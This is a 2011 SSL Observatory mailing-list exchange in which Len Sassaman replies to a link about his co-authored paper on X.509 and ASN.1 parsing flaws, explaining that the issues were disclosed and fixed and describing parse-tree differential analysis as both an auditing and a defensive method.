[SSL Observatory] Interesting fun with Verisign and X.509 by Kaminsky, Patterson, Sassaman

Len Sassaman len.sassaman at gmail.com
Thu May 5 00:46:50 PDT 2011 

Hi Chris,

This is, of course, work that is nearly two years old. (We issued a
white-paper under embargo in early 2009, gave a presentation on it at
Black Hat that year, and then the paper you linked to was published at
FC 2010.) The bulk of the ASN.1 problems we disclosed were fixed by
the major affected parties prior to the Black Hat talk. It was not
specifically a Verisign problem.

That said, I'm convinced there are more such problems waiting to be
discovered. The key contribution of that paper is really not the
findings, but the methodology we developed, and it's applicable to far
more than just ASN.1 or X.509 — but please don't take that to mean
there aren't still attacks to be found by parse-tree differential
analysis in X.509; S/MIME and STARTTLS are obvious targets, and OCSP
keeps me up at night.

I'm currently working on a paper expressing the fundamentals of the
analysis methods we've developed (both as used in this paper, to aid
auditing, as well as being the basis of a strong defense against
malicious input — e.g., we have code for a PKCS#1 parser validator
that would have protected against the Bleichenbacher "e=3" attack, had
it been incorporated into OpenSSL and NSS.) I'm hoping to see
automated parse-tree differential tools integrated into the usual code
analysis suites eventually.

I'm happy to send a draft, when it's finished, to this list if there's interest.


—Len.

On Wed, May 4, 2011 at 7:45 PM, Chris Palmer <chris at eff.org> wrote:
> https://www.cosic.esat.kuleuven.be/publications/article-1432.pdf
>
> """In this paper, we demonstrate two new classes of collision, which will be somewhat trickier to address than previous attacks against X.509: the applicability of MD2 preimage attacks against the primary root certificate for Verisign, and the difficulty of validating X.509 Names contained within PKCS#10 Certificate Requests. We also draw particular attention to two possibly unrecognized vectors for implementation flaws that have been problematic in the past: the ASN.1 BER decoder required to parse PKCS#10, and the potential for SQL injection from text contained within its requests."""
>
>
> --
> Chris Palmer
> Technology Director, Electronic Frontier Foundation
> https://www.eff.org/code
>
>

More information about the Observatory mailing list